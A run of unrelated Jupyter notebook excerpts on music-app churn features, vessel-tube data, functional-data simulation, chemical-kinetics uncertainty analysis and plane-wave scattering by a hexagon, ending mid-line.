Find out the duplicated 'song_id'ssong_id_groupby_object = df_play_log[['song_name','singer','song_type','song_id']].\ groupby(['song_name','singer','song_type']) combinations = [] song_id_groups = [] for i, group in enumerate(song_id_groupby_object): combinations.append(group[0]) song_id_groups.append(group[1]) len(combinations) go = 1 i = 10 while go: if list(set(song_id_groups[i].song_id))[0] != '0': i += 1 else: i += 1 go = 0 i song_id_groups[63] df_play_log.loc[song_id_groups[63].index,:] song_id_groups_dict[combinations[119999]] song_id_groups_dict = df_play_log[['song_name','singer','song_type','song_id']].\ groupby(['song_name','singer','song_type']).groups import time lap_start = time.clock() new_song_id_list = [] for i in xrange(len(combinations)): if (i >0) & (i%100 == 0): print 'processing %dth - %dth song; previous lap costed %.2f seconds\r' % (i,i+100, (time.clock()-lap_start)) lap_start = time.clock() # a song has a normal song_id and the abnormal '0' # assign all song_id to be the normal one if len(set(song_id_groups[i].song_id)) > 1: df_play_log.loc[song_id_groups[i].index,'song_id']=max(song_id_groups[i].song_id) new_song_id_list.append(max(song_id_groups[i].song_id)) # when there is only one song_id (all song_id are the same if multiple lines) # if song_id == '0' # assign the group index with 'g' leading: e.g. 'g2017'. elif list(set(song_id_groups[i].song_id))[0] == '0': df_play_log.loc[song_id_groups[i].index,'song_id'] = 'g'+str(i) new_song_id_list.append('g'+str(i)) # the rest all has normal song_id, no change in song_id else: new_song_id_list.append(list(set(song_id_groups[i].song_id))[0]) total_songs = len(new_song_id_list) total_songs k = 63 new_song_id_list[k],combinations[k] df_play_log.loc[df_play_log.song_id == new_song_id_list[63]] df_songs = pd.DataFrame({'song_id':new_song_id_list, 'song_name': [combinations[i][0] for i in xrange(total_songs)], 'singer':[combinations[i][1] for i in xrange(total_songs)], 'song_type':[combinations[i][2] for i in xrange(total_songs)]}) df_songs = df_songs.set_index('song_id') df_songs.head() # times of play also necessary df_songs['times_played'] = [song_id_groups[i].shape[0] for i in xrange(total_songs)] df_songs.head() df_songs.info() # get favorite songs info popular_songs = df_play_log['song_id'].value_counts()[:200].index popular_songs[100:110] # the rarely played songs are also worth examining. 
rarely_played = sum(df_play_log['song_id'].value_counts()<2) rarely_played rarely_played_songs = df_play_log.song_id.value_counts()[-1:-rarely_played-1:-1].index len(rarely_played_songs) # searching play log of a certain rare song df_play_log.loc[df_play_log.song_id == rarely_played_songs[0]] df_songs.loc[df_songs.index == rarely_played_songs[0]]reduce the size of the original df_play_log In the following analysis, the detailed information can be ommitted from the df_play_log, while the only information left is song_iddf_play_log = df_play_log.drop(['song_name','singer','paid_flag'],axis = 1) df_play_log.head()Save current data framesfilename = 'C:\\Users\\Sean\\Documents\\BitTiger\\Capston_music_player_python\\reduced_play_log.csv' df_play_log.to_csv(filename,sep = '\t', mode = 'a', encoding = 'utf-8') # also save into .pickle filename_pickle = 'C:\\Users\\Sean\\Documents\\BitTiger\\Capston_music_player_python\\reduced_play_log.pkl' df_play_log.to_pickle(filename_pickle) # songs song_file = 'C:\\Users\\Sean\\Documents\\BitTiger\\Capston_music_player_python\\songs.csv' df_play_log.to_csv(song_file,sep = '\t', mode = 'a', encoding = 'utf-8') song_file_pickle = 'C:\\Users\\Sean\\Documents\\BitTiger\\Capston_music_player_python\\songs.pkl' df_play_log.to_csv(song_file_pickle) total_counts_series = df_play_log.groupby('uid').size() total_counts_series.index abnormal_uid = total_counts_series.index[total_counts_series>6600] abnormal_uid df_play_log.uid.value_counts()III. Feature creation: primary features based on the play log Two features to create: 1. rare_song_player (taking 0,1), and 2. song_popular_ratiorare_song_player_id = df_play_log.loc[df_play_log.song_id.isin(rarely_played_songs),'uid'] df_play_log['is_popular'] = df_play_log.song_id.isin(popular_songs) df_play_log.head() df_play_log[['uid','is_popular']].groupby('uid').mean() df = pd.DataFrame(columns= ['uid','device','major_song_type','total_play_time']) df.uid = df_play_log.groupby(['uid']).size().index df df['popular_songs_ratio'] = list(df_play_log[['uid','is_popular']].groupby('uid').mean()['is_popular']) df.head() #majority vote of device df.device = list(df_play_log.groupby('uid')['device'].apply(lambda x: x.value_counts().index[0])) df.head() df.device.value_counts() #majority vote of song_type df.major_song_type = list(df_play_log.groupby('uid')['song_type'].apply(lambda x: x.value_counts().index[0])) df.head() df.major_song_type.value_counts() df.total_play_time = list(df_play_log.groupby('uid')['play_time'].sum()/60) # change time unit to minutes sum(df.total_play_time>100000) bins = [-1,100,200,300,400,500,600,700,800,900,1000,2000,3000,4000,5000,6000,7000,8000,9000,10000,float('inf')] bin_names = ['0-100','100-200','200-300','300-400','400-500','500-600','600-700','700-800','800-900','900-1k',\ '1k-2k','2k-3k','3k-4k','4k-5k','5k-6k','6k-7k','7k-8k','8k-9k','9k-10k','10k+'] play_time_label = pd.cut(df.total_play_time,bins, labels = bin_names) play_time_label.value_counts() df.groupby(play_time_label).mean()['label']Obviously, when accumulated play time is between 1000 and 9000 minutes, the user is unlikely to churn( churn rate < 0.25)df['play_time_label'] = play_time_label df.head() df_mean = df_play_log.groupby('uid').mean() df_mean df_mean.label = df_mean.label.astype(int) df_mean.label.value_counts() df['avg_play_time'] = list(df_mean.play_time) df['label']=list(df_mean.label) df.head() df.groupby(['play_time_label','label']).size().unstack() # number of most frequently played songs 
sum(df_play_log.groupby('song_id').size()>1000) popular_songs = df_play_log['song_id'].value_counts()[:674].index df_play_log['is_popular'] = df_play_log.song_id.isin(set(popular_songs)) df_play_log.head() # number of least frequently played songs num_least_pop = sum(df_play_log.groupby('song_id').size()<=1) num_least_pop least_popular_songs = df_play_log['song_id'].value_counts()[-1:-num_least_pop-1:-1].index df_play_log['least_popular'] = df_play_log.song_id.isin(set(least_popular_songs)) df_play_log.head() df['total_play_count'] = list(df_play_log.groupby('uid').size()) df['least_popular_count'] = list(df_play_log.groupby('uid').sum()['least_popular']) df.head() df['least_popular_ratio'] = df.apply(lambda x: x.least_popular_count/x.total_play_count, axis = 1) df.head() df.groupby(pd.cut(df.least_popular_ratio, np.percentile(df.least_popular_ratio, [0, 44.3, 100]), \ include_lowest=True))\ .mean()['label'] # The users who has played the rare songs are less likely to churn:Examine the cutoff for labeling popular songs: 500,1000,2000popular_songs_cutoff = [500,1000,2000] cutoff_quantile_dict = {} for i in range(len(popular_songs_cutoff)): print 'procesing no.%d cutoff: %d' % (i,popular_songs_cutoff[i]) num_pop_songs = sum(df_play_log.groupby('song_id').size()>popular_songs_cutoff[i]) popular_songs = df_play_log['song_id'].value_counts()[:(num_pop_songs-1)].index df_play_log['is_popular'] = df_play_log.song_id.isin(set(popular_songs)) df_temp = df_play_log.groupby('uid').mean() cutoff_quantile_dict[i] = df_temp.groupby(pd.cut(df_temp.is_popular, \ np.percentile(df_temp.is_popular, [0, 25,50,75, 100]),include_lowest = True)).mean()['label'] cutoff_quantile_dict pd.DataFrame({popular_songs_cutoff[0]:list(cutoff_quantile_dict[0]), popular_songs_cutoff[1]:list(cutoff_quantile_dict[1]), popular_songs_cutoff[2]:list(cutoff_quantile_dict[2])})The different cutoffs give similar results: When the user does play popular songs a lot( pop ratio in the >75% quantile among all users), the churn rate will be much higher. The fact, that the 3rd quantile value changes monotonically with the cutoff value for the popular songs, suggests the absolute value of the times playing popular songs, instead of the percentage of pop songs in one's play activity, is the more direct factor to predict churns.df_temp = df_play_log.groupby('uid').sum() df_temp.label = df_temp.label.apply(lambda x: x>0) df_temp.groupby(pd.cut(df_temp.is_popular, \ np.percentile(df_temp.is_popular, [0, 25,75, 100]),include_lowest = True)).mean()['label']Choosing 2000 as the cutoff time of plays for popular songs. Then, the 25% and 75% quantiles of users' popular song values, 5 and 50 can differentiate the users significantly. When n < 5, churn possibility is high. When n > 50, churn possibility is low. 
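To make the stated 5/50 rule explicit, a small sketch can bucket users by their absolute number of popular-song plays and compare churn rates. This assumes the `df_play_log` with the `is_popular` flag computed above for the 2000-play cutoff, and treats any positive `label` as churn; the `per_user`, `churned`, and `buckets` names are introduced here only for illustration.

```python
import numpy as np
import pandas as pd

# Bucket users by their absolute number of popular-song plays (is_popular
# computed with the 2000-play cutoff above) and compare churn rates across
# the <5 / 5-50 / >50 buckets described in the text.
per_user = df_play_log.groupby('uid').agg({'is_popular': 'sum', 'label': 'max'})
per_user['churned'] = (per_user['label'] > 0).astype(int)

buckets = pd.cut(per_user['is_popular'],
                 bins=[-np.inf, 5, 50, np.inf],
                 labels=['fewer than 5', '5 to 50', 'more than 50'])
print(per_user.groupby(buckets)['churned'].mean())
```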
What about the other cutoff values?# cutoff value is 500 popular_song_cutoff = 500 popular_songs_num = sum(df_play_log.groupby('song_id').size() > popular_song_cutoff) popular_songs = df_play_log['song_id'].value_counts()[:(popular_songs_num-1)].index df_play_log['is_popular'] = df_play_log.song_id.isin(set(popular_songs))25%, 75% quantile cutoffs are 17 and 107 for defining popular songs as played more than 500 times.df_temp = df_play_log.groupby('uid').sum() df_temp.label = df_temp.label.apply(lambda x: int(x>0)) df_temp.groupby(pd.cut(df_temp.is_popular, \ np.percentile(df_temp.is_popular, [0, 25,75, 100]),include_lowest = True)).mean()['label'] df_temp.head() df['most_popular_count'] = list(df_play_log.groupby('uid').sum()['is_popular']) df.head()Examine the count of plays in different time windowdf_daily_count = df_play_log.groupby(['uid','date']).size().unstack().fillna(0) df_daily_count.head() days = df_daily_count.shape[1] days df['count_play_1'] = list(df_daily_count.iloc[:,(days-1)]) df.head() for i in [3,7,14,23]: colname = 'count_play_'+str(i) df[colname] = list(df_daily_count.iloc[:,(days-i):days].sum(axis = 1)) df.head() df.shape labels = list(df['label']) df = df.drop(['label','least_popular_ratio','total_play_count'],axis = 1) df.head() df['label'] = labels df.label = df.label.astype(int) df.head() df.shape df.loc[df.uid.isin(abnormal_uid)] filename_pickle = 'C:\\Users\\Sean\\Documents\\BitTiger\\Capston_music_player_python\\features_and_label.pkl' df.to_pickle(filename_pickle) test = pd.read_pickle(filename_pickle) test.shape test.head()This notebook illustrates the [TubeTK](http://tubetk.org) tube NumPy array data structure and how to create histograms of the properties of a [VesselTube](https://www.itk.org/Doxygen/html/classitk_1_1VesselTubeSpatialObject.html).First, import the function for reading a tube file in as a NumPy array, and read in the file.import os import sys from itk import tubes_from_file tubes = tubes_from_file("data/Normal071-VascularNetwork.tre")The result is a [NumPy Record Array](https://docs.scipy.org/doc/numpy/user/basics.rec.html) where the fields of the array correspond to the properties of a [VesselTubeSpatialObjectPoint](https://www.itk.org/Doxygen/html/classitk_1_1VesselTubeSpatialObjectPoint.html).print(type(tubes)) print(tubes.dtype) [('Id', 'The length of the array corresponds to the number of points that make up the tubes.print(len(tubes)) print(tubes.shape)106061 (106061,)Individual points can be sliced, or views can be created on individual fields.print('Entire points 0, 2:') print(tubes[:4:2]) print('\nPosition of points 0, 2') print(tubes['PositionInWorldSpace'][:4:2])Entire points 0, 2: [(-1, [121.26599451, 94.40424276, 0.30700558], [1., 0., 0., 1.], [0.82861531, 0.52673039, 0.18960951], [ 0.55138761, -0.70933917, -0.43910095], [ 0.09679036, -0.46839411, 0.87820191], 1.277065, 0., 0., 0., 0., 0., 0.) 
(-1, [121.33222107, 94.44634136, 0.32216 ], [1., 0., 0., 1.], [0.85344853, 0.48634417, 0.18733647], [-0.50062039, 0.86495203, 0.03517395], [ 0.14493042, 0.12380361, -0.98166585], 1.277065, 0., 0., 0., 0., 0., 0.)] Position of points 0, 2 [[121.26599451 94.40424276 0.30700558] [121.33222107 94.44634136 0.32216 ]]We can easily create a histogram of the radii or visualize the point positions.%pylab inline from mpl_toolkits.mplot3d import Axes3D import matplotlib.pyplot as plt fig = plt.figure(figsize=(16, 6)) ax = fig.add_subplot(1, 2, 1) ax.hist(tubes['RadiusInWorldSpace'], bins=100) ax.set_xlabel('Radius') ax.set_ylabel('Count') ax = fig.add_subplot(1, 2, 2, projection='3d') subsample = 100 position = tubes['PositionInWorldSpace'][::subsample] radius = tubes['RadiusInWorldSpace'][::subsample] ax.scatter(position[:,0], position[:,1], position[:,2], s=(2*radius)**2) ax.set_title('Point Positions') ax.set_xlabel('X') ax.set_ylabel('Y') ax.set_zlabel('Z');Populating the interactive namespace from numpy and matplotlibGeneration of the data# Load packages import numpy as np import pickle from FDApy.representation.simulation import Brownian from FDApy.representation.functional_data import DenseFunctionalData from FDApy.representation.functional_data import MultivariateFunctionalData # Define parameters of the simulation N1, N2, N3, N4, N5 = 200, 200, 200, 200, 200 M = 101 hurst1, hurst2 = 0.9, 0.8 x = np.linspace(1, 21, M) labels = np.repeat([0, 1, 2, 3, 4], repeats=(N1, N2, N3, N4, N5)) # Define mean functions def h(x, a): return 6 - np.abs(x - a) h_1 = lambda x: h(x, 7) / 4 if h(x, 7) > 0 else 0 h_2 = lambda x: h(x, 15) / 4 if h(x, 15) > 0 else 0 h_3 = lambda x: h(x, 11) / 4 if h(x, 11) > 0 else 0 # Simulation one scenario A = np.zeros((N1 + N2 + N3 + N4 + N5, M)) B = np.zeros((N1 + N2 + N3 + N4 + N5, M)) for idx in range(N1 + N2 + N3 + N4 + N5): h1 = np.array([h_1(i) for i in x]) h2 = np.array([h_2(i) for i in x]) h3 = np.array([h_3(i) for i in x]) brownian = Brownian(name='fractional') brownian.new(1, argvals=np.linspace(0, 2, 2 * M), hurst=hurst1) rand_part1 = brownian.data.values[0, M:] / (1 + np.linspace(0, 1, M)) ** hurst1 brownian = Brownian(name='fractional') brownian.new(1, argvals=np.linspace(0, 2, 2 * M), hurst=hurst2) rand_part2 = brownian.data.values[0, M:] / (1 + np.linspace(0, 1, M)) ** hurst2 eps = np.random.normal(0, np.sqrt(0.5), size=M) if idx < N1: A[idx, :] = h1 + rand_part1 + eps B[idx, :] = h3 + 1.5 * rand_part2 + eps elif N1 <= idx < N1 + N2: A[idx, :] = h2 + rand_part1 + eps B[idx, :] = h3 + 0.8 * rand_part2 + eps elif N1 + N2 <= idx < N1 + N2 + N3: A[idx, :] = h1 + rand_part1 + eps B[idx, :] = h3 + 0.2 * rand_part2 + eps elif N1 + N2 + N3 <= idx < N1 + N2 + N3 + N4: A[idx, :] = h2 + 0.1 * rand_part1 + eps B[idx, :] = h2 + 0.2 * rand_part2 + eps else: A[idx, :] = h3 + rand_part1 + eps B[idx, :] = h1 + 0.2 * rand_part2 + eps # Create functional data object data_1 = DenseFunctionalData({'input_dim_0': np.linspace(0, 1, M)}, A) data_2 = DenseFunctionalData({'input_dim_0': np.linspace(0, 1, M)}, B) data_fd = MultivariateFunctionalData([data_1, data_2])Smooth the data# Smooth the data data_1_smooth = data_1.smooth(points=0.5, neighborhood=6) data_2_smooth = data_2.smooth(points=0.5, neighborhood=6) data_fd_smooth = MultivariateFunctionalData([data_1_smooth, data_2_smooth]) # Save the data with open('./data/scenario_2.pkl', 'wb') as f: pickle.dump(data_fd, f) with open('./data/scenario_2_smooth.pkl', 'wb') as f: pickle.dump(data_fd_smooth, f) with open('./data/labels.pkl', 
'wb') as f: pickle.dump(labels, f) # Save as CSV for R methods np.savetxt('./data/scenario_2_A.csv', A, delimiter=',') np.savetxt('./data/scenario_2_B.csv', B, delimiter=',') np.savetxt('./data/scenario_2_A_smooth.csv', data_1_smooth.values, delimiter=',') np.savetxt('./data/scenario_2_B_smooth.csv', data_2_smooth.values, delimiter=',') np.savetxt('./data/labels.csv', labels, delimiter=',')First Order Local Uncertainty Analysis for Chemical Reaction SystemsThis ipython notebook performs first order local uncertainty analysis for a chemical reaction systemusing a RMG-generated model.from rmgpy.tools.uncertainty import Uncertainty from rmgpy.tools.canteraModel import getRMGSpeciesFromUserSpecies from rmgpy.species import Species from IPython.display import display, Image import os # Define the CHEMKIN and Dictionary file paths. This is a reduced phenyldodecane (PDD) model. # Must use annotated chemkin file chemkinFile = 'uncertainty/chem_annotated.inp' dictFile = 'uncertainty/species_dictionary.txt' # Alternatively, unhighlight the following lines and comment out the lines above to use the minimal model, # which will not take as long to process # Make sure to also uncomment the specified lines two code blocks down which are related # chemkinFile = 'data/minimal_model/chem_annotated.inp' # dictFile = 'data/minimal_model/species_dictionary.txt'Initialize the `Uncertainty` class object with the model.uncertainty = Uncertainty(outputDirectory='uncertainty') uncertainty.loadModel(chemkinFile, dictFile)We can now perform stand-alone sensitivity analysis.# Map the species to the objects within the Uncertainty class PDD = Species().fromSMILES("CCCCCCCCCCCCc1ccccc1") C11ene=Species().fromSMILES("CCCCCCCCCC=C") ETHBENZ=Species().fromSMILES("CCc1ccccc1") mapping = getRMGSpeciesFromUserSpecies([PDD,C11ene,ETHBENZ], uncertainty.speciesList) initialMoleFractions = {mapping[PDD]: 1.0} T = (623,'K') P = (350,'bar') terminationTime = (72, 'h') sensitiveSpecies=[mapping[PDD], mapping[C11ene]] # If you used the minimal model, uncomment the following lines and comment out the lines above # ethane = Species().fromSMILES('CC') # C2H4 = Species().fromSMILES('C=C') # Ar = Species().fromSMILES('[Ar]') # mapping = getRMGSpeciesFromUserSpecies([ethane, C2H4, Ar], uncertainty.speciesList) # # Define the reaction conditions # initialMoleFractions = {mapping[ethane]: 1.0, mapping[Ar]:50.0} # T = (1300,'K') # P = (1,'atm') # terminationTime = (5e-4, 's') # sensitiveSpecies=[mapping[ethane], mapping[C2H4]] # Perform the sensitivity analysis uncertainty.sensitivityAnalysis(initialMoleFractions, sensitiveSpecies, T, P, terminationTime, number=5, fileformat='.png') # Show the sensitivity plots for species in sensitiveSpecies: print '{}: Reaction Sensitivities'.format(species) index = species.index display(Image(filename=os.path.join(uncertainty.outputDirectory,'solver','sensitivity_1_SPC_{}_reactions.png'.format(index)))) print '{}: Thermo Sensitivities'.format(species) display(Image(filename=os.path.join(uncertainty.outputDirectory,'solver','sensitivity_1_SPC_{}_thermo.png'.format(index))))If we want to run local uncertainty analysis, we must assign all the uncertainties using the `Uncertainty` class' `assignParameterUncertainties` function. `ThermoParameterUncertainty` and `KineticParameterUncertainty` classes may be customized and passed into this function if non-default constants for constructing the uncertainties are desired. This must be done after the parameter sources are properly extracted from the model. 
Thermo UncertaintyEach species is assigned a uniform uncertainty distribution in free energy:$G \in [G_{min},G_{max}]$$dG = (G_{max} - G_{min})/2$Several parameters are used to formulate $dG$. These are $dG_{library}$, $dG_{QM}$, $dG_{GAV}$, and $dG_{group}$. $dG = \delta_{library} dG_{library} + \delta_{QM} dG_{QM} +\delta_{GAV} dG_{GAV} +\sum_{group} w_{group} dG_{group}$where $\delta$ is a dirac delta function which equals one if the species thermochemistry parameter contains the particular source type and $w_{group}$ is the weight of the thermo group used to construct the species thermochemistry in the group additivity method. Kinetics UncertaintyEach reaction is assigned a uniform uncertainty distribution in the overall ln(k), or ln(A):$d \ln (k) \in [\ln(k_{min}),\ln(k_{max})]$$d\ln(k) = [\ln(k_{max})-\ln(k_{min})]/2$The parameters used to formulate $d \ln(k)$ are $d\ln(k_{library})$, $d\ln(k_{training})$, $d\ln(k_{pdep})$, $d\ln(k_{family})$, $d\ln(k_{non-exact})$, and $d\ln(k_{rule})$.For library, training, and pdep reactions, the kinetic uncertainty is assigned according to their uncertainty type. For kinetics estimated using RMG's rate rules, the following formula is used to calculate the uncertainty:$d \ln (k) = d\ln(k_{family}) + \log_{10}(N+1)*dln(k_{non-exact})+\sum_{rule} w_{rule} d \ln(k_{rule})$where N is the total number of rate rules used and $w_{rule}$ is the weight of the rate rule used to estimate the kinetics.uncertainty.loadDatabase() uncertainty.extractSourcesFromModel() uncertainty.assignParameterUncertainties()The first order local uncertainty, or variance $(d\ln c_i)^2$, for the concentration of species $i$ is defined as:$(d\ln c_i)^2 = \sum_j \left(\frac{d\ln c_i}{d\ln k_j}d\ln k_j\right)^2 + \sum_k \left(\frac{d\ln c_i}{dG_k}dG_k\right)^2$We have previously performed the sensitivity analysis. Now we perform the local uncertainty analysis and apply the formula above using the parameter uncertainties and plot the results. This first analysis considers the parameters to be independent. In other words, even when multiple species thermochemistries depend on a single thermo group or multiple reaction rate coefficients depend on a particular rate rule, each value is considered independent of each other. This typically results in a much larger uncertainty value than in reality due to cancellation error.uncertainty.localAnalysis(sensitiveSpecies, correlated=False, number=5, fileformat='.png') # Show the uncertainty plots for species in sensitiveSpecies: print '{}: Thermo Uncertainty Contributions'.format(species) display(Image(filename=os.path.join(uncertainty.outputDirectory,'thermoLocalUncertainty_{}.png'.format(species.toChemkin())))) print '{}: Reaction Uncertainty Contributions'.format(species) display(Image(filename=os.path.join(uncertainty.outputDirectory,'kineticsLocalUncertainty_{}.png'.format(species.toChemkin()))))Correlated UncertaintyA more accurate picture of the uncertainty in mechanism estimated using groups and rate rules requires accounting of the correlated errors resulting from using the same groups in multiple parameters. This requires us to track the original sources: the groups and the rate rules, which constitute each parameter. These errors may cancel in the final uncertainty calculation. Note, however, that the error stemming from the estimation method itself do not cancel. For thermochemistry, the error terms described previously are $dG_{library}$, $dG_{QM}$, $dG_{GAV}$, and $dG_{group}$. 
Of these, $dG_{GAV}$ is an uncorrelated independent residual error, whereas the other terms are correlated. Noting this distinction, we can re-categorize and index these two types of parameters in terms of correlated sources $dG_{corr,y}$ and uncorrelated sources $dG_{res,z}$.For kinetics, the error terms described perviously are $d\ln(k_{library})$, $d\ln(k_{training})$, $d\ln(k_{pdep})$, $d\ln(k_{family})$, $d\ln(k_{non-exact})$, and $d\ln(k_{rule})$. Of these, $d\ln(k_{family})$, $d\ln(k_{non-exact})$ are uncorrelated independent error terms resulting from the method of estimation. Again, we re-categorize the correlated versus non-correlated sources as $d\ln k_{corr,v}$ and $d\ln k_{res,w}$, respectively. The first order local uncertainty, or variance $(d\ln c_{corr,i})^2$, for the concentration of species $i$ becomes:$(d\ln c_{corr,i})^2 = \sum_v \left(\frac{d\ln c_i}{d\ln k_{corr,v}}d\ln k_{corr,v}\right)^2 + \sum_w \left(\frac{d\ln c_i}{d\ln k_{res,w}}d\ln k_{res,w}\right)^2 + \sum_y \left(\frac{d\ln c_i}{dG_{corr,y}}dG_{corr,y}\right)^2 + \sum_z \left(\frac{d\ln c_i}{dG_{res,z}}dG_{res,z}\right)^2$where the differential terms can be computed as:$\frac{d\ln c_i}{d\ln k_{corr,v}} = \sum_j \frac{d\ln c_i}{d\ln k_j}\frac{d\ln k_j}{d\ln k_{corr,v}}$$\frac{d\ln c_i}{d G_{corr,y}} = \sum_k \frac{d\ln c_i}{dG_k}\frac{dG_k}{dG_{corr,y}}$uncertainty.assignParameterUncertainties(correlated=True) uncertainty.localAnalysis(sensitiveSpecies, correlated=True, number=10, fileformat='.png') # Show the uncertainty plots for species in sensitiveSpecies: print '{}: Thermo Uncertainty Contributions'.format(species) display(Image(filename=os.path.join(uncertainty.outputDirectory,'thermoLocalUncertainty_{}.png'.format(species.toChemkin())))) print '{}: Reaction Uncertainty Contributions'.format(species) display(Image(filename=os.path.join(uncertainty.outputDirectory,'kineticsLocalUncertainty_{}.png'.format(species.toChemkin()))))Scattering of a plane wave by a hexagonThis is a script for computing the scattering of a plane wave by a penetrable hexagon using the 2D DDA version of the volume integral equation method. 
It is similar to the first demo, for the circle, but in addition shows how to:* compute the field in a larger domain than the computation domain* compute the far-field pattern* compute the far-field pattern for the scatterer in random orientation# Import packages import os import sys # FIXME: avoid this sys.path stuff sys.path.append(os.path.join(os.path.abspath(''), '../../')) import numpy as np from scipy.sparse.linalg import LinearOperator, gmres import time from vines.geometry.geometry import shape_2d, generatedomain2d from vines.operators.acoustic_operators import get_operator_2d, circulant_embedding from vines.fields.plane_wave import PlaneWave_2d from vines.operators.acoustic_matvecs import mvp_2d from vines.precondition.circulant_acoustic import mvp_circ_2d, circulant_preconditionerIntroduction to the volume integral equation methodThe boundary value problem we wish to solve is:Given a complex refractive index $\mu(x)\in\mathbb{C}$, incident wave $u^{\text{inc}}$ and wavenumber $k\in\mathbb{R}$, find the scattered field $u^{\text{sca}}$ such that$$ (\nabla^2 + (\mu(x) k)^2)u^{\text{sca}}(x) = -(\nabla^2 + (\mu(x) k)^2)u^{\text{inc}}(x).$$The incident wave satisfies the Helmholtz equation with the wavenumber $k$, so the right-hand side can be simplified to yield$$ (\nabla^2 + (\mu(x) k)^2)u^{\text{sca}}(x) = -(\mu(x)^2-1) k^2u^{\text{inc}}(x).$$This tells us that the scattered field is generated by regions in which $\mu(x)\neq 1$, as we should expect. Let us suppose that we have one closed region $V$ in which $\mu(x)\neq 1$. Then it can be shown that the total field $u:=u^{\text{inc}}+u^{\text{sca}}$ satisfies the following volume integral equation:$$ u(x) - k^2\int_{V}G(x,y)(\mu(y)^2-1)u(y)\text{d}y = u^{\text{inc}}(x),$$where $G$ is Green's function:$$ G(x, y) = \frac{i}{4}H_0^{(1)}(k|x-y|), \quad x\neq y, \quad \text{in two dimensions.}$$# Set problem parameters and discretization resolution ko = 32 # wavenumber refInd = 1.31 # refractive index shape = 'hex' # choose shape (hex, circle, ellipse) radius = 1 # radius of shape n_per_lam = 10 # number of points per wavelength angle = 0 # Incident wave angle to x-axis d_inc = np.array([np.cos(angle), np.sin(angle)]) lambda_ext = 2 * np.pi / ko # wavelength # Generate grid points (r), indices of interior points (idx), pixel size (dx), shape vertices (verts), interior wavelength (lambda_int) r, idx, dx, verts, lambda_int = shape_2d(shape, refInd, lambda_ext, radius, n_per_lam) M, N, _ = r.shape # number of voxels in x,y directions (M, N, respectively) 960**2*0.6 # Get Toeplitz operator a = np.sqrt(dx**2 / np.pi) # radius of equivalent area circle toep = get_operator_2d(dx**2, ko, r, a) # Circulant embedding of Toeplitz matrix (required for FFT matvec) opCirc = circulant_embedding(toep, M ,N) # Set up the mu^2-1 matrix, call it MR mu_sq = np.ones((M, N)) mu_sq[idx] = refInd ** 2 MR = mu_sq - 1 # Define matrix-vector product and corresponding linear operator mvp = lambda x: mvp_2d(x, opCirc, idx, MR) A = LinearOperator((M*N, M*N), matvec=mvp) # Construct circulant approximation of Toeplitz matrix in x-direction for preconditioning start = time.time() circ_inv = circulant_preconditioner(toep, M, N, refInd) end = time.time() print('Preconditioner assembly time = ', end - start) # Set up matrix-vector product with circulant preconditioner and establish preconditioner operator mvp_prec = lambda x: mvp_circ_2d(x, circ_inv, M, N, idx) prec = LinearOperator((M*N, M*N), matvec=mvp_prec) # Assemble right-hand side (u_inc). Use a plane wave. 
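# Note that the integral equation above is posed over the scatterer V only: outside the hexagon
# mu(x) = 1, so (mu(x)^2 - 1) = 0 and those pixels contribute nothing to the integral operator.
# This is why the right-hand side below is kept only at the interior pixels (idx) and is zero elsewhere.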
u_inc = PlaneWave_2d(1, ko, d_inc, r) # Create an array that equals the incident field inside the scatterer and is zero outside rhs = np.zeros((M, N), dtype=np.complex128) rhs[idx] = u_inc[idx] rhs_vec = rhs.reshape((M*N, 1), order='F') # Perform iterative solve it_count = 0 def iteration_counter(x): global it_count it_count += 1 start = time.time() solp, info = gmres(A, rhs_vec, M=prec, tol=1e-5, callback=iteration_counter) end = time.time() print("The linear system was solved in {0} iterations".format(it_count)) print("Solve time {0} seconds".format(end-start))The linear system was solved in 26 iterations Solve time 0.15004801750183105 secondsEvaluating the field everywhereThe solution we have obtained lives only on the scatterer. In order to evaluate the scattered field (and hence total field) throughout the domain, we can rearrange our original integral equation to give the following representation for the scattered field:$$ u^{\text{sca}}(x) = k^2\int_V G(x, y)(\mu^2(y)-1)u(y)\text{d}y.$$That is, we require one matrix-vector product to compute the scattered field.from vines.operators.acoustic_matvecs import scattered_field # Scattered field u_sca = scattered_field(solp, opCirc, M, N, MR) # Total field u = u_inc + u_sca # Plot the field %matplotlib inline import matplotlib from matplotlib import pyplot as plt from matplotlib.patches import Polygon from matplotlib.collections import PatchCollection matplotlib.rcParams.update({'font.size': 20}) plt.rc('text', usetex=True) plt.rc('font', family='serif') fig = plt.figure(figsize=(8, 5)) ax = fig.gca() plt.imshow(np.real(u.T), extent=[r[0, 0, 0], r[-1, 0, 0], r[0, 0, 1], r[0, -1, 1]], cmap=plt.cm.get_cmap('seismic'), interpolation='bilinear')#'spline16') polygon = Polygon(verts, facecolor="none", edgecolor='black', lw=0.8) plt.gca().add_patch(polygon) plt.xlabel('$x$') plt.ylabel('$y$') plt.colorbar() plt.show()Evaluate over a larger domainWhat if we want to evaluate the field over a region that is larger than the original computation domain, which was the smallest bounding box around the hexagon? This is doable but requires the creation of a new grid and a new (Toeplitz) operator on this grid. 
For efficiency, it makes sense to ensure that the original grid sits within the new grid and that the pixels are the same size.# First set up variables for the dimensions of bounding-box computational domain wx = r[-1, 0, 0] - r[0, 0, 0] + dx wy = r[0, -1, 1] - r[0, 0, 1] + dx # Create a larger domain for field evaluation # Let's make the new domain the original one previous plus a border or width w_extra w_extra = lambda_ext * 3 # w_extra = 0.5 # Now adjust to make sure pixels of new ones will equal the original ones nn = np.ceil(w_extra / dx) wx_big = 2 * nn * dx + wx wy_big = 2 * nn * dx + wy r_big, M_big, N_big = generatedomain2d(dx, wx_big, wy_big) # Find pixels inside original computation domain idx_eval = (r_big[:, :, 0] > r[0, 0, 0] - dx/2) * \ (r_big[:, :, 0] < r[-1, 0, 0] + dx/2) * \ (r_big[:, :, 1] > r[0, 0, 1] - dx/2) * \ (r_big[:, :, 1] < r[0, -1, 1] + dx/2) # Get Toeplitz operator on new domain toep_big = get_operator_2d(dx**2, ko, r_big, a) # Circulant embedding of Toeplitz matrix opCirc_big = circulant_embedding(toep_big, M_big, N_big) # Next create the refractive index matrix mu_sq_big = np.ones((M_big, N_big)) mu_sq_big[idx_eval] = mu_sq.reshape(M*N, 1)[:, 0] MR_big = mu_sq_big - 1 # Create a new solution matrix that contains the original solution at the correct locations u_sol_big = np.zeros((M_big, N_big), dtype=np.complex128) u_sol = solp.reshape(M, N, order='F') u_sol_big[idx_eval] = u_sol.reshape(M*N, 1)[:, 0] # Evaluate incident field on new grid u_inc_big = PlaneWave_2d(1, ko, d_inc, r_big) # Convert u_sol_big into vector solp_eval = u_sol_big.reshape((M_big*N_big, 1), order='F') # Scattered field u_sca_big = 